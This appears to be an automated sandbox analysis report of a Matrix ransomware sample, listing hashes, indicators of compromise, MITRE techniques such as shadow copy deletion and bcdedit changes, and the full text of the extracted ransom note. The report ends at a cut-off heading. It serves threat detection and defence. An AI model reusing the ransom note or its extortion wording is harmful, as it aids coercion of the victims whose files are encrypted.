matrix | 44ee695b532eb984e46de29569ce35854b37d409efaabb6bcf9f5316e2b0546d

Resubmissions

18-04-2024 18:50

240418-xha8wabh29 10

01-01-2024 15:12

240101-slnwxsfeh4 10

Analysis

max time kernel
1798s
max time network
1575s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
18-04-2024 18:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
Size

3.7MB
MD5

9c7e90d7637277bb4f4985405eb0ace9
SHA1

5b0899d790eb4a37260e5d9b8a2ad3f2ada55b1d
SHA256

335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf
SHA512

7b57021edfa1108558c2d02df0600de55fd9338dfebc044c03dc677072975acc216a0374cff270d9d75f20e5b92b252f75b2ad3b94f603e7a09f69c14ca888d9
SSDEEP

98304:Pvqlou/EtfzJS+1S6+T9aLcNvvj5Pudln7QktFJLRyC2hVW13:w/Q7I+T8aLcNvvjQn7QkjFkDVW

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Path

C:\Program Files\Google\Chrome\Application\#NOBAD_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par empty\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 3327BD6FB3D94447\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b empty\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 3327BD6FB3D94447\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 4KiCYYNX\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe

description	ioc	process
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\en-US\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\it-IT\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Microsoft Games\Solitaire\de-DE\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Kentucky\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files (x86)\MSBuild\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1weu80pa.default-release\datareporting\glean\db\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\modules\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Microsoft Games\Minesweeper\ja-JP\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Microsoft Games\More Games\ja-JP\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\es-ES\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\js\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Microsoft Games\Minesweeper\de-DE\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CJQLK5UF\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Users\Admin\Saved Games\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jre7\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\VideoLAN\VLC\skins\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Microsoft Games\FreeCell\de-DE\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\it-IT\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jre7\bin\server\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Microsoft Games\Chess\de-DE\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Users\All Users\Microsoft\Assistance\Client\1.0\de-DE\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Microsoft Games\Purble Place\es-ES\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Users\Admin\Favorites\Windows Live\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Microsoft Games\Chess\es-ES\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe
File created	C:\Program Files\Microsoft Games\More Games\es-ES\#NOBAD_README#.rtf	335160bee7e253c4ffa69e5164c4a36fe5fb4be2c246958dfcc509d8202db5cf.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

3696 bcdedit.exe
3712 bcdedit.exe
Drops file in Drivers directory 1 IoCs

Processes:

mVSen3Ss64.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS mVSen3Ss64.exe

pid	process
3696	bcdedit.exe
3712	bcdedit.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	mVSen3Ss64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

mVSen3Ss64.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	mVSen3Ss64.exe

Executes dropped EXE 64 IoCs

Processes:

NWPbIiay.exemVSen3Ss.exemVSen3Ss64.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exemVSen3Ss.exe

pid	process
2608	NWPbIiay.exe
2172	mVSen3Ss.exe
1444	mVSen3Ss64.exe
1328	mVSen3Ss.exe
1676	mVSen3Ss.exe
1220	mVSen3Ss.exe
1016	mVSen3Ss.exe
2508	mVSen3Ss.exe
2288	mVSen3Ss.exe
1864	mVSen3Ss.exe
2384	mVSen3Ss.exe
1400	mVSen3Ss.exe
2580	mVSen3Ss.exe
1620	mVSen3Ss.exe
1632	mVSen3Ss.exe
2852	mVSen3Ss.exe
1020	mVSen3Ss.exe
1636	mVSen3Ss.exe
2056	mVSen3Ss.exe
2012	mVSen3Ss.exe
836	mVSen3Ss.exe
1624	mVSen3Ss.exe
3040	mVSen3Ss.exe
3048	mVSen3Ss.exe
3028	mVSen3Ss.exe
2632	mVSen3Ss.exe
3276	mVSen3Ss.exe
1792	mVSen3Ss.exe
4068	mVSen3Ss.exe
2524	mVSen3Ss.exe
1156	mVSen3Ss.exe
3212	mVSen3Ss.exe
4020	mVSen3Ss.exe
3184	mVSen3Ss.exe
3312	mVSen3Ss.exe
1012	mVSen3Ss.exe
2104	mVSen3Ss.exe
1332	mVSen3Ss.exe
2376	mVSen3Ss.exe
3404	mVSen3Ss.exe
3436	mVSen3Ss.exe
3524	mVSen3Ss.exe
3568	mVSen3Ss.exe
3588	mVSen3Ss.exe
1196	mVSen3Ss.exe
2440	mVSen3Ss.exe
752	mVSen3Ss.exe
1760	mVSen3Ss.exe
3668	mVSen3Ss.exe
2948	mVSen3Ss.exe
1340	mVSen3Ss.exe
1064	mVSen3Ss.exe
2796	mVSen3Ss.exe
2748	mVSen3Ss.exe
3672	mVSen3Ss.exe
3776	mVSen3Ss.exe
3676	mVSen3Ss.exe
3900	mVSen3Ss.exe
3932	mVSen3Ss.exe
1152	mVSen3Ss.exe
2816	mVSen3Ss.exe
2084	mVSen3Ss.exe
2328	mVSen3Ss.exe
2688	mVSen3Ss.exe

Loads dropped DLL 64 IoCs

Processes:

